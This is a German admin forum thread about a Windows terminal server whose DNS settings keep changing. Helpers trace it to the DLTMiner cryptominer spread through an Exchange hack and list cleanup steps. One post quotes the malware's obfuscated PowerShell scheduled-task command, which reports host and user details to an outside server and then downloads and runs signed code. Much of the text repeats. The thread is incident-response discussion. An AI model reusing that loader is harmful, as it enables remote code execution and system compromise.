9
DNS-Eintrag ändert sich selbstständig
Hallo liebe Gemeinde,
Es geht um einen Terminal-Server Windows 2012 R2, der von einer Domäne in eine andere Domäne migriert wurde.
Nach dem Wechsel der Domäne läuft scheinbar alles normal, die User können sich per RDP anmelden.
Allerdings passiert nach etwa 30-60 Minuten folgendes in den Netzwerkeinstellungen: Der korrekt eingestellte DNS-Server (DC01) wird anscheinend automatisch ersetzt durch 8.8.8.8 und Secondary 9.9.9.9.
Dann kann sich niemand mehr remote anmelden und der DNS muss von Hand wieder eingetragen werden. Das ganze wiederholt sich regelmäßig.
Habt ihr Ideen? Braucht ihr mehr Infos?
Danke und liebe Grüße
puerto
Es geht um einen Terminal-Server Windows 2012 R2, der von einer Domäne in eine andere Domäne migriert wurde.
Nach dem Wechsel der Domäne läuft scheinbar alles normal, die User können sich per RDP anmelden.
Allerdings passiert nach etwa 30-60 Minuten folgendes in den Netzwerkeinstellungen: Der korrekt eingestellte DNS-Server (DC01) wird anscheinend automatisch ersetzt durch 8.8.8.8 und Secondary 9.9.9.9.
Dann kann sich niemand mehr remote anmelden und der DNS muss von Hand wieder eingetragen werden. Das ganze wiederholt sich regelmäßig.
Habt ihr Ideen? Braucht ihr mehr Infos?
Danke und liebe Grüße
puerto
Share on Facebook
Share on Twitter
Share on Reddit
Share on LinkedinPlease also mark the comments that contributed to the solution of the article
Content-Key: 664924
Url: https://administrator.de/contentid/664924
Printed on: April 19, 2024 at 08:04 o'clock
9 Comments
Latest comment
Hi,
nachdem ich jetzt selber 8 std mit dem problem rumgemacht habe und ich schon im bett bin:
1) alle prozesse bzgl powershell beenden.
da sind auch viele kryptische danei
2) im aufgabenplaner alle suspekten einträge löschen
3) c windows temp alle suspekten dateien löschen z.b. .bin
4) c windows system32 windowspowershell v1.0 alle suspekten exe löschen und die powershell.exe vorerst umbenennen
5) dns einträge wieder richtig setzen
6a) microsoft security schnelltest
6b) kaspersky endpoint security 11.6,x testversion laden und voll scannen lassen und an lassen
bis morgen
nachdem ich jetzt selber 8 std mit dem problem rumgemacht habe und ich schon im bett bin:
1) alle prozesse bzgl powershell beenden.
da sind auch viele kryptische danei
2) im aufgabenplaner alle suspekten einträge löschen
3) c windows temp alle suspekten dateien löschen z.b. .bin
4) c windows system32 windowspowershell v1.0 alle suspekten exe löschen und die powershell.exe vorerst umbenennen
5) dns einträge wieder richtig setzen
6a) microsoft security schnelltest
6b) kaspersky endpoint security 11.6,x testversion laden und voll scannen lassen und an lassen
bis morgen
Achja, und den gehackten exchange server am besten als allererstes abschalten oder isolieren 
vermutlich infiziert bzw remoteshell't der die maschinen übers netz.
Das ist der cryptominer DLTMiner der da bei dir wütet, eingeschleust über die Exchange Lücke von vor 2 Wochen.
vermutlich infiziert bzw remoteshell't der die maschinen übers netz.Das ist der cryptominer DLTMiner der da bei dir wütet, eingeschleust über die Exchange Lücke von vor 2 Wochen.
Schau mal, ob das durch eine GPO erfolgen könnte.
Ich habe in der Tat in der Aufgabenplanung einige Einträge gefunden, die Powershell ausführen.
z.B.
Ich bin ja sehr interessiert, kann mir jemand sagen, was dieser Befehl macht?
System ist bereits isoliert, ich würde gerne etwas forschen, was da los ist.
Danke und liebe Grüße
puerto
z.B.
-c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 133){$b=$d[133..$c];$p=New-
Object Security.Cryptography.RSAParameters;$p.Modulus=
[convert]::FromBase64String('2m2o17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/Y10WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpU3cv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x00,0x01,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object
Security.Cryptography.SHA2CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-
join[char[]]$b)}}}$url='http://'+'t.zke'+'r1.com';a($url+'/b.jsp?rep_20210319?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject
Win32_ComputerSystemProduct).UUID,(random))-join'*')) Ich bin ja sehr interessiert, kann mir jemand sagen, was dieser Befehl macht?
System ist bereits isoliert, ich würde gerne etwas forschen, was da los ist.
Danke und liebe Grüße
puerto
Hallo tikayevent,
ich konnte bisher nix erkennen, sind keine neuen dazugekommen und die alten auch nicht bearbeitet worden.
Bei mir ist der vermutlich gehackte Exchange isoliert und die Powershell.exe auf dem Server wo das Problem mit dem Crypto Miner besteht umbenannt.
Seit dem keine Auffälligkeiten mehr.
ich konnte bisher nix erkennen, sind keine neuen dazugekommen und die alten auch nicht bearbeitet worden.
Bei mir ist der vermutlich gehackte Exchange isoliert und die Powershell.exe auf dem Server wo das Problem mit dem Crypto Miner besteht umbenannt.
Seit dem keine Auffälligkeiten mehr.
Zitat von @puerto:
Hallo liebe Gemeinde,
Es geht um einen Terminal-Server Windows 2012 R2, der von einer Domäne in eine andere Domäne migriert wurde.
Nach dem Wechsel der Domäne läuft scheinbar alles normal, die User können sich per RDP anmelden.
Allerdings passiert nach etwa 30-60 Minuten folgendes in den Netzwerkeinstellungen: Der korrekt eingestellte DNS-Server (DC01) wird anscheinend automatisch ersetzt durch 8.8.8.8 und Secondary 9.9.9.9.
Dann kann sich niemand mehr remote anmelden und der DNS muss von Hand wieder eingetragen werden. Das ganze wiederholt sich regelmäßig.
Habt ihr Ideen? Braucht ihr mehr Infos?
Hallo liebe Gemeinde,
Es geht um einen Terminal-Server Windows 2012 R2, der von einer Domäne in eine andere Domäne migriert wurde.
Nach dem Wechsel der Domäne läuft scheinbar alles normal, die User können sich per RDP anmelden.
Allerdings passiert nach etwa 30-60 Minuten folgendes in den Netzwerkeinstellungen: Der korrekt eingestellte DNS-Server (DC01) wird anscheinend automatisch ersetzt durch 8.8.8.8 und Secondary 9.9.9.9.
Dann kann sich niemand mehr remote anmelden und der DNS muss von Hand wieder eingetragen werden. Das ganze wiederholt sich regelmäßig.
Habt ihr Ideen? Braucht ihr mehr Infos?
Du hast Malware auf Deinem System (Exchange-Hack).
Alles neu aufsetzen!
Insbesondere das AD ist anscheinend betroffen.
Nachtrag:
Um es nochmal mit Nachdruk zu sagen: nach den beschriebenen Symptomen ist Dein Netz und AD verseucht. Das sinnvollste ist, alles vom netz zu trennen und frisch hochzuziehen. Ansonsten wirst Du auch noch in einem Jahr immer wieder mit Nachwirkungen zu kämpfen haben. Das ist zwar viel Arbeit udn kostet u.U. auch viel Geld und Zeit, aber das Risiko später viel mehr zeit udn geld zu verlieren schätze ich höher ein. Es gibt schon die ersten Erpressungstrojaner, die auf dem Exchange-Hack aufbauen, bzw. auf den Hintertüren, die dadurch geschaffen wurden.
lks
lks
1
